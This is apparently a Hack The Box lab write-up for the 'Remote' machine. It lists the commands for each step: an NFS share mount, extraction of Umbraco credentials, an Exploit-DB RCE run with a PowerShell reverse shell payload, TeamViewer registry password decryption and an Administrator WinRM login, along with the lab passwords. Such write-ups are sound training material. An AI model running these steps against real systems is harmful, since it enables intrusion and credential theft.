RemoteMarch 07, 2026 Created by Page Difficulty OS mrb3n8132 Hack The Box Easy Windows Enumeration I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.180 -oG scan /opt/extractports scan nmap -p21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680 -sCV 10.10.10.180 -oN ports Initial Access (NFS Enumeration) I focused on the NFS port (2049) first. Using showmount, I listed the available exports: showmount -e 10.10.10.180 The output revealed a critical shared resource: /site_backups (accessible by everyone). I mounted this share to my local machine: sudo mount -t nfs 10.10.10.180:/ ./target-NFS -o nolock Umbraco Credential Extraction Inside the mounted share, I found an Umbraco.sdf database file. Knowing this is a standard database format, I used strings to extract readable text, searching for usernames and hashed passwords: strings Umbraco.sdf > cadenas I successfully identified a password hash. After cracking it using CrackStation, I recovered the valid login credentials: admin@htb.local : baconandcheese Remote Code Execution (RCE) I used the credentials to log into the web application, which was identified as Umbraco version 7.12.4. I searched for public exploits for this version and found a Remote Code Execution (RCE) Proof of Concept (PoC) on Exploit-DB (ID: 49488). Exploit Reference: https://www.exploit-db.com/exploits/49488 I tested the exploit by executing a simple command to confirm RCE capability. python3 49488.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell -a 'ls ../../../Users/public/desktop' I then generated a Base64-encoded PowerShell reverse shell payload and executed it through the exploit to gain an interactive shell. python3 49488.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell -a '-e JABjA...' I successfully read the first flag. Privilege Escalation TeamViewer Credential Decryption System enumeration revealed that TeamViewer version 7 was installed on the host. I checked the TeamViewer configuration within the registry to look for sensitive information. CVE Reference: https://community.teamviewer.com/English/discussion/82264/specification-on-cve-2019-18988 reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7 The registry output contained the SecurityPasswordAES field, which stores an encrypted password: SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B I used a public repository designed for decrypting TeamViewer passwords to recover the cleartext password using the SecurityPasswordAES binary data. Decryption Tool: https://github.com/fuzzlove/TeamViewer-Password-Decrypt/tree/main The recovered password was: !R3m0te! Final Access I validated the recovered password and used it to log into the system as the Administrator via WinRM, successfully escalating my privileges. netexec winrm 10.10.10.180 -u Administrator -p '!R3m0te!' evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!' I then read the second (root) flag.